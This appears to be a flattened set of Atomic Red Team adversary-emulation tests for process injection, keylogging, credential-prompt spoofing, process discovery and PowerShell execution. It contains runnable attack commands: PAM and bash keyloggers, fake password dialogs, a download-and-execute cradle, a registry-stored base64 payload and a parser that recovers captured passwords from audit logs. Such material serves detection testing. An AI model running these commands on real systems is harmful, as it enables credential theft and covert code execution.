Prereq: Portable Executable to inject must exist at specified location (T1055.002\bin\RedInjection.exe)
if (Test-Path "T1055.002\bin\RedInjection.exe") {exit 0} else {exit 1}
Description: This test injects a MessageBox shellcode generated by msfvenom in Notepad.exe using Thread Execution Hijacking. When successful, a message box will appear with the "Atomic Red Team" caption after one or two seconds.
T1055.004 - Process Injection: Asynchronous Procedure Call
Process Injection via C#
"T1055.004\bin\T1055.exe"
Description: Process Injection using C#
reference: https://github.com/pwndizzle/c-sharp-memory-injection
Exercises Five Techniques
1. Process injection
2. ApcInjectionAnyProcess
3. ApcInjectionNewProcess
4. IatInjection
5. ThreadHijack
Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout.
Prereq: T1055.004\bin\T1055.exe must exist on the system.
if (Test-Path "T1055.004\bin\T1055.exe") {exit 0} else {exit 1}
T1055.004 - Process Injection: Asynchronous Procedure Call
Description: Creates a process in a suspended state and calls QueueUserAPC WinAPI to add a UserAPC to the child process that points to allocated shellcode.
ResumeThread is called which then calls NtTestAlert to execute the created UserAPC which then executes the shellcode.
This technique allows for the early execution of shellcode and potentially before AV/EDR can hook functions to support detection.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
- References:
- https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/
- https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
T1055.004 - Process Injection: Asynchronous Procedure Call
Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
T1055.004\bin\x64\NtQueueApcThreadEx.exe -debug
Description: Uses the undocumented NtQueueAPCThreadEx WinAPI to create a "Special User APC" in the current thread of the current process to execute shellcode.
Since the shellcode is loaded and executed in the current process it is considered local shellcode execution.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Get a handle to the current thread
5. Execute the shellcode in the current thread by creating a Special User APC through the NtQueueApcThreadEx function
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
- References:
- https://repnz.github.io/posts/apc/user-apc/
- https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html
- https://0x00sec.org/t/process-injection-apc-injection/24608
- https://twitter.com/aionescu/status/992264290924032005
- http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505
T1055.011 - Process Injection: Extra Window Memory Injection
Process Injection via Extra Window Memory (EWM) x64 executable
T1055.011\bin\T1055.011_#{arch}.exe
Description: Hooks functions of main process to inject a payload via Extra Window Memory (EWM) injection technique
Prereq: T1055.011x64.exe and payload must exist on disk at specified location (T1055.011\bin\T1055.011_#{arch}.exe and T1055.011\bin\payload.exe_#{arch}.bin)
if (Test-Path T1055.011\bin\T1055.011_#{arch}.exe) {exit 0} else {exit 1}
. "T1055.012\src\Start-Hollow.ps1"
$ppid = Get-Process explorer | select -expand id
Start-Hollow -Sponsor "C:\Windows\System32\notepad.exe" -Hollow "C:\Windows\System32\cmd.exe" -ParentPID $ppid -Verbose
Description: This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent.
Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1)
Prereq: Start-Hollow.ps1 must be installed
if (Test-Path "T1055.012\src\Start-Hollow.ps1") {exit 0} else {exit 1}
Description: Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
Description: Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
allows for the retrieval of output generated from executed shellcode.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
Description: This test injects shellcode into a remote RegEdit process using the ListPlanting technique. ListPlanting abuses a window that hosts a ListView control: the payload is written into the target process with NtWriteVirtualMemory and then executed via PostMessage. When successful, a message box will appear with the title "Warning" and the content "Atomic Red Team" after a few seconds. Notepad will open following the appearance of the message box.
Prereq: Injector ListPlanting.exe must exist at specified location (T1055.015\bin\ListPlanting.exe)
if (Test-Path "T1055.015\bin\ListPlanting.exe") {exit 0} else {exit 1}
Description: This module injects shellcode into a newly created process and executes it. By default the shellcode is created with Metasploit, for use on x86-64 Windows 10 machines.
Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office
is required.
Prereq: The 64-bit version of Microsoft Office must be installed
Description: Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread).
Especially useful against domain controllers in Active Directory environments.
It must be executed in the context of a user who is privileged on remote `machine`.
The effect of `/inject` is explained in
Prereq: Mimikatz executor must exist on disk and at specified location (%tmp%\mimikatz\x64\mimikatz.exe)
Description: This test creates a section object in the local process followed by a local section view.
The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view.
A thread is then created in the target process, using the remote section view as start address.
Description: This test uses the undocumented Windows remote-fork API RtlCreateProcessReflection to create a clone of the parent process with shellcode written into its memory. The shellcode executes in the forked child process. The technique was first presented at BlackHat Europe 2022. The shellcode will open a message box and a notepad.
Description: This test exploits legitimate PE files that carry a section with RWX permissions and enough space for shellcode.
The RWX injection avoids VirtualAlloc, WriteVirtualMemory and ProtectVirtualMemory, and so evades detection mechanisms
that rely on API call sequences and heuristics. The RWX injection uses the API call sequence: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.
The injected shellcode will open a message box and a notepad.
RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.
More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
Prereq: Utility to inject must exist on disk at specified location (T1055\bin\x64\vuln_dll\msys-2.0.dll)
if (Test-Path "T1055\bin\x64\vuln_dll\msys-2.0.dll") {exit 0} else {exit 1}
Process Injection with Go using UuidFromStringA WinAPI
T1055\bin\x64\UuidFromStringA.exe -debug
Description: Uses WinAPI UuidFromStringA to load shellcode to a memory address then executes the shellcode using EnumSystemLocalesA.
With this technique, memory is allocated on the heap and does not use commonly suspicious APIs such as VirtualAlloc, WriteProcessMemory, or CreateThread
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)
- References:
- https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
- https://twitter.com/_CPResearch_/status/1352310521752662018
- https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala
Process Injection with Go using EtwpCreateEtwThread WinAPI
T1055\bin\x64\EtwpCreateEtwThread.exe -debug
Description: Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode within the application's process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
Steps taken with this technique
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call EtwpCreateEtwThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)
- References:
- https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3
- https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm
Description: Executes shellcode in a remote process.
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with RtlCreateUserThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)
- References:
- https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike
Description: Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
- References:
- https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
Description: Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
Process Injection with Go using CreateThread WinAPI
T1055\bin\x64\CreateThread.exe -debug
Description: This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
Process Injection with Go using CreateThread WinAPI (Natively)
T1055\bin\x64\CreateThreadNative.exe -debug
Description: This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
Description: The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread
The injected shellcode will open a message box and a notepad.
Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
Concept from: http://ropgadget.com/posts/abusing_win_functions.html
Prereq: Portable Executable to inject must exist at specified location (T1055\bin\x64\uuid_injection.exe)
if (Test-Path "T1055\bin\x64\uuid_injection.exe") {exit 0} else {exit 1}
Description: Utilize PowerShell and external resource to capture keystrokes
[Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1)
Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log.
Prereq: Get-Keystrokes PowerShell script must exist on disk at PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1
if (Test-Path "T1056.001\src\Get-Keystrokes.ps1") {exit 0} else {exit 1}
Cleanup:
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
T1056.001 - Input Capture: Keylogging
Living off the land Terminal Input Capture on Linux with pam.d
if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi
if sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi
sudo touch /tmp/password-auth.bk
sudo touch /tmp/system-auth.bk
echo "session required pam_tty_audit.so enable=* log_passwd" | sudo tee -a /etc/pam.d/password-auth >/dev/null
echo "session required pam_tty_audit.so enable=* log_passwd" | sudo tee -a /etc/pam.d/system-auth >/dev/null
Description: PAM (Pluggable Authentication Modules), present on all modern Linux systems, generally ships a module called pam_tty_audit.so which logs all keystrokes of the selected users to the audit log. All terminal activity in any new login session is then archived and readable by an adversary with elevated privileges.
Passwords hidden by the console can also be logged with the 'log_passwd' option, as in this example. If root is audited, output from any process later started by root is also logged, even when the policy is enabled carefully (e.g. starting with 'disable=*').
Use 'aureport --tty' or other audit-log reading tools to read the output, which is stored hex-encoded rather than as plain text. macOS does not currently ship the pam_tty_audit.so library.
Prereq: Checking if pam_tty_audit.so is installed
test -f /usr/lib/pam/pam_tty_audit.so -o -f /usr/lib64/security/pam_tty_audit.so
PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
tail /var/log/syslog
Description: There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
Prereq: This test requires to be run in a bash shell and that logger and tee are installed.
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
Description: There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
To gain persistence the command could be added to the users .shrc or .profile
Prereq: This test must be run in sh (/bin/sh) and requires that logger is installed.
if [ "$(echo $SHELL)" != "/bin/sh" ]; then echo -e "\n***** sh not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
Description: When a command is executed in bash, the BASH_COMMAND variable contains that command. For example, `:~$ echo $BASH_COMMAND` prints "echo $BASH_COMMAND". The trap command is not an external command but a built-in function of bash, and can be used in a script to run a bash function when some event occurs. trap can react each time the BASH_COMMAND value changes and write that value to a file, creating a bash-session-based keylogger.
To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
Prereq: This test requires to be run in a bash shell
if [ "$(echo $0)" != "bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
Description: Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
Prereq: This test requires sshd and auditd
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
Cleanup:
cp -fv /tmp/sshd /etc/pam.d/
T1056.001 - Input Capture: Keylogging
Auditd keylogger
auditctl -a always,exit -F arch=b64 -S execve -k CMDS
auditctl -a always,exit -F arch=b32 -S execve -k CMDS
whoami; ausearch -i --start now
Description: The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
Prereq: This test requires auditd
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
Cleanup:
systemctl restart auditd
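The pam_tty_audit tests above and the execve-rule test directly above all land in /var/log/audit/audit.log, and both kinds of record need decoding before they are readable: TTY records carry the keystrokes as a hex string in data=, and EXECVE records hex-encode any argument containing spaces or control characters, while the uid/auid/key context lives in a separate SYSCALL record that shares the same msg=audit(ts:serial) stamp. The parser below is an added example, not part of Atomic Red Team: it groups records by serial, decodes the hex fields where auditd uses them, and returns the recovered keystrokes and command lines. The log lines are constructed to match the record shapes described above (timestamps, pids and the typed password are made up).

```python
"""Recover keystrokes (pam_tty_audit TTY records) and executed commands
(EXECVE + SYSCALL records) from audit.log text. Added example, not ART code;
the sample log is constructed."""
import re

RECORD = re.compile(r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$")
FIELD = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def _parse_fields(rtype, body):
    fields = {}
    for key, val in FIELD.findall(body):
        if val.startswith('"'):
            val = val[1:-1]                              # quoted: plain text
        elif (rtype == "EXECVE" and re.fullmatch(r"a\d+", key)) or (rtype == "TTY" and key == "data"):
            # auditd hex-encodes EXECVE args with spaces/controls and all TTY data.
            val = bytes.fromhex(val).decode("utf-8", "replace")
        fields[key] = val
    return fields


def group_events(log_text):
    """Map serial -> {"ts": ..., "<TYPE>": fields}. One audit event is emitted as
    several records with the same serial; long EXECVE arg lists even span
    several EXECVE records, hence the update() rather than assignment."""
    events = {}
    for line in log_text.splitlines():
        m = RECORD.match(line.strip())
        if not m:
            continue
        ev = events.setdefault(m.group("serial"), {"ts": m.group("ts")})
        ev.setdefault(m.group("type"), {}).update(_parse_fields(m.group("type"), m.group("body")))
    return events


def list_commands(log_text):
    """argv of every execve, with auid/exe/key taken from the paired SYSCALL record."""
    out = []
    for serial, ev in group_events(log_text).items():
        ex = ev.get("EXECVE")
        if not ex:
            continue
        argv = [ex[f"a{i}"] for i in range(int(ex.get("argc", 0))) if f"a{i}" in ex]
        sc = ev.get("SYSCALL", {})
        out.append({"serial": serial, "argv": argv, "auid": sc.get("auid"),
                    "exe": sc.get("exe"), "key": sc.get("key")})
    return out


def list_keystrokes(log_text):
    """Decoded keystroke buffers from pam_tty_audit, one entry per TTY record."""
    return [{"pid": ev["TTY"]["pid"], "comm": ev["TTY"]["comm"], "keys": ev["TTY"]["data"]}
            for ev in group_events(log_text).values() if "TTY" in ev]


# Constructed sample: two TTY records (the second is a password typed at a sudo
# prompt, captured because log_passwd is set), then two execve events each made
# of a SYSCALL record (key="CMDS" from the rule above) and an EXECVE record.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1700000000.101:201): tty pid=2201 uid=1000 auid=1000 ses=4 major=136 minor=0 comm="bash" data=6C73202D6C0D
type=TTY msg=audit(1700000000.202:202): tty pid=2201 uid=1000 auid=1000 ses=4 major=136 minor=0 comm="sudo" data=53337063723374210D
type=SYSCALL msg=audit(1700000000.303:203): arch=c000003e syscall=59 success=yes exit=0 a0=55d5e8c0 a1=55d5e9f0 a2=55d5ea00 a3=8 items=2 ppid=2201 pid=2310 auid=1000 uid=1000 gid=1000 euid=1000 ses=4 comm="whoami" exe="/usr/bin/whoami" key="CMDS"
type=EXECVE msg=audit(1700000000.303:203): argc=1 a0="whoami"
type=SYSCALL msg=audit(1700000000.404:204): arch=c000003e syscall=59 success=yes exit=0 a0=55d5f000 a1=55d5f100 a2=55d5f200 a3=8 items=2 ppid=2201 pid=2311 auid=1000 uid=0 gid=0 euid=0 ses=4 comm="bash" exe="/usr/bin/bash" key="CMDS"
type=EXECVE msg=audit(1700000000.404:204): argc=3 a0="bash" a1="-c" a2=6964203E202F746D702F78
"""

if __name__ == "__main__":
    for k in list_keystrokes(SAMPLE_AUDIT_LOG):
        print("keys", k["pid"], k["comm"], repr(k["keys"]))
    for c in list_commands(SAMPLE_AUDIT_LOG):
        print("exec", c["serial"], c["auid"], c["key"], c["argv"])
```

The keystroke buffers come back with the raw carriage returns the user typed, which is what lets you see a hidden password as a complete line; the execve view shows why the SYSCALL join matters, since auid (the original login) survives the sudo to uid 0 in the second event.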
T1056.001 - Input Capture: Keylogging
MacOS Swift Keylogger
swift T1056.001/src/MacOSKeylogger.swift -keylog
Description: Utilizes a Swift script to log keystrokes to stdout. It runs for 5 seconds, then dumps the output to standard output. Input Monitoring is required.
Input Monitoring can be enabled in System Preferences > Security & Privacy > Privacy > Input Monitoring.
Reference: https://cedowens.medium.com/taking-esf-for-a-nother-spin-6e1e6acd1b74
Prereq: swift script must exist at T1056.001/src/MacOSKeylogger.swift, and the terminal must have input monitoring permissions.
if [ -f T1056.001/src/MacOSKeylogger.swift ]; then chmod +x T1056.001/src/MacOSKeylogger.swift; else exit 1; fi
Cleanup:
kill `pgrep swift-frontend`
T1056.002 - Input Capture: GUI Input Capture
AppleScript - Prompt User for Password
osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'
Description: Prompt User for Password (Local Phishing)
Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html
T1056.002 - Input Capture: GUI Input Capture
PowerShell - Prompt User for Password
# Creates GUI to prompt for password. Expect long pause before prompt is available.
$cred = $host.UI.PromptForCredential('Windows Security Update', '', [Environment]::UserName, [Environment]::UserDomainName)
# Using Write-Warning to allow the message to show on the console, as echo and similar commands are not visible from the Invoke-AtomicTest framework.
Write-Warning $cred.GetNetworkCredential().Password
Description: Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials.
Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
T1056.002 - Input Capture: GUI Input Capture
AppleScript - Spoofing a credential prompt using osascript
PWD_SPOOF=$(osascript -e 'display dialog "To perform a security update MacOS needs your passphrase." with title "MacOS Security Update" default answer "" with icon stop with hidden answer')
echo "$PWD_SPOOF"
Description: Prompt user for password without requiring permissions to send Apple events to System Settings.
https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/
Description: Hooks functions in PowerShell to read TLS Communications
Prereq: T1056.004x64.dll must exist on disk at specified location (T1056.004\bin\T1056.004x64.dll)
if (Test-Path "T1056.004\bin\T1056.004x64.dll") {exit 0} else {exit 1}
T1057 - Process Discovery
Process Discovery - ps
ps >> /tmp/loot.txt
ps aux >> /tmp/loot.txt
Description: Utilize ps to identify processes.
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
Cleanup:
rm /tmp/loot.txt
T1057 - Process Discovery
Process Discovery - tasklist
tasklist
Description: Utilize tasklist to identify processes.
Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - Get-Process
Get-Process
Description: Utilize Get-Process PowerShell cmdlet to identify processes.
Upon successful execution, powershell.exe will execute Get-Process to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - get-wmiObject
get-wmiObject -class Win32_Process
Description: Utilize get-wmiObject PowerShell cmdlet to identify processes.
Upon successful execution, powershell.exe will execute get-wmiObject to list processes. Output will be via stdout.
T1057 - Process Discovery
Process Discovery - wmic process
wmic process get /format:list
Description: Utilize windows management instrumentation to identify processes.
Upon successful execution, WMIC will execute process to list processes. Output will be via stdout.
T1057 - Process Discovery
Discover Specific Process - tasklist
tasklist | findstr lsass
Description: Adversaries may use command line tools to discover specific processes in preparation of further attacks.
Examples of this could be discovering the PID of lsass.exe to dump its memory or discovering whether specific security processes (e.g. AV or EDR) are running.
Description: Process Hacker can be abused to inspect and manipulate system processes, identify targets such as security software, or gain unauthorized control over a system. Its use is often flagged by security defenses, which makes it a risky tool for an adversary.
Prereq: Process Hacker must be installed in the location
Description: PC Hunter is a toolkit with access to hundreds of settings including kernels, kernel modules, processes, network, startup, and more. When abused, this tool can allow threat actors to effectively access sensitive processes, collect system information, and terminate security software.
Description: An adversary may launch taskmgr.exe with the /7 switch via command prompt to view processes running on the system.
[Reference](https://github.com/trellix-enterprise/ac3-threat-sightings/blob/main/sightings/Sightings_Conti_Ransomware.yml)
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Prereq: SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
if (Test-Path "..\ExternalPayloads\SharpHound.ps1") {exit 0} else {exit 1}
Cleanup:
Remove-Item $env:Temp\*BloodHound.zip -Force
T1059.001 - Command and Scripting Interpreter: PowerShell
Run Bloodhound from Memory using Download Cradle
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1'); Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
Description: Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run, and then compress and store the data to the temp directory. If the system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
Cleanup:
Remove-Item $env:Temp\*BloodHound.zip -Force
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Note: Windows 10 only. Upon execution, the Windows Backup and Restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: PowerShell MsXml COM object download cradle. Not proxy aware; the cache is removed, although the cradle does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: PowerShell XML download request. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
T1059.001 - Command and Scripting Interpreter: PowerShell
Powershell Invoke-DownloadCradle
{MISSING IN ATOMIC RED TEAM}
Description: Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
T1059.001 - Command and Scripting Interpreter: PowerShell
PowerShell Fileless Script Execution
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
Description: Execution of a PowerShell payload from the Windows Registry, similar to that seen in fileless malware infections. Upon execution, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder.
Description: Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
Description: Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
Description: Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Check for privilege escalation paths using PowerUp from PowerShellMafia
T1059.001 - Command and Scripting Interpreter: PowerShell
Abuse Nslookup with DNS Records
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Description: Red teamers avoid IEX and Invoke-WebRequest in their PowerShell commands. Instead, they host a text record with a payload to compromise hosts.
[reference](https://twitter.com/jstrosch/status/1237382986557001729)
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory.
src: https://github.com/FalconForceTeam/SOAPHound
T1059.001 - Command and Scripting Interpreter: PowerShell
Description: Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename.
src: https://github.com/FalconForceTeam/SOAPHound
T1059.002 - Command and Scripting Interpreter: AppleScript
Description: Shell Script with AppleScript. The encoded python script will perform an HTTP GET request to 127.0.0.1:80 with a session cookie of "t3VhVOs/DyCcDTFzIKanRxkvk3I=", unless 'Little Snitch' is installed, in which case it will just exit.
You can use netcat to listen for the connection and verify execution, e.g. use "nc -l 80" in another terminal window before executing this test and watch for the request.
Reference: https://github.com/EmpireProject/Empire
T1059.003 - Command and Scripting Interpreter: Windows Command Shell
Writes text to a file and displays it.
echo "Hello from the Windows Command Prompt!" > "%TEMP%\test.bin" & type "%TEMP%\test.bin"
